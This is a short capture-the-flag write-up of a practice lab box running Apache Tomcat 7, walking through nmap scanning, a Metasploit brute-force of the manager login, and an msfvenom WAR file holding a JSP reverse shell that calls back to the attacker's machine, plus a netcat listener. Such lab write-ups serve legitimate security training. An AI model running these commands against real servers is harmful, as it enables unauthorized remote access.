This was the first box I did

Phase 1: Recon

Phase 2: Scanning

Nmap scan report for 10.10.10.95
Host is up (0.073s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2008|7|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 7 Professional (85%), Microsoft Windows Vista SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 72.49 ms 10.10.14.1
2 72.56 ms 10.10.10.95
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.39 seconds

Findings:

Phase 3:Exploitation / Gaining Access

Clicking on Manger App gives us a a login box , now we could Google and search for Apache 7.0 credentials , but there a Metasploit module to brute force them use auxiliary/scanner/http/tomcat_mgr_login

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf > ... set rhosts 10.10.10.95
msf > ... run

Using these default credentials allow us to log in the Web Application Manger where we up can upload and deploy Java War files

Using msfvemon we create a WAR file with a reverse shell payload , upload it. There a good msfvemeon cheat sheet over at https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=444 -f war > shell.war

LHOST : attacker machine IP Address

LPORT : the port to listen on the attacker machine , I’m using 444 but you can use any just make sure it is not a common port number

Once the WAR file is created we need create a listener with netcat , open a new terminal window an type

nc -nlvp 444

(side-note in the OSCP you not allow to to use Metasploit but you can use msfvenom to create a payload)

In the Tomcat Web Application Manger click on browse, select your WAR file , then click on Deploy

Click on the uploaded file or open browser an go to http://10.10.10.95:8080/<warname>

You should get a shell back with admin privileges.

Phase 4: Maintaining Access

Locating the flags

This shell act just like an normal windows command prompt of just cd in to the Administrator folder

cd C:\Users\Administrator\

Phase 5: Covering tracks

Just type exit to exit the session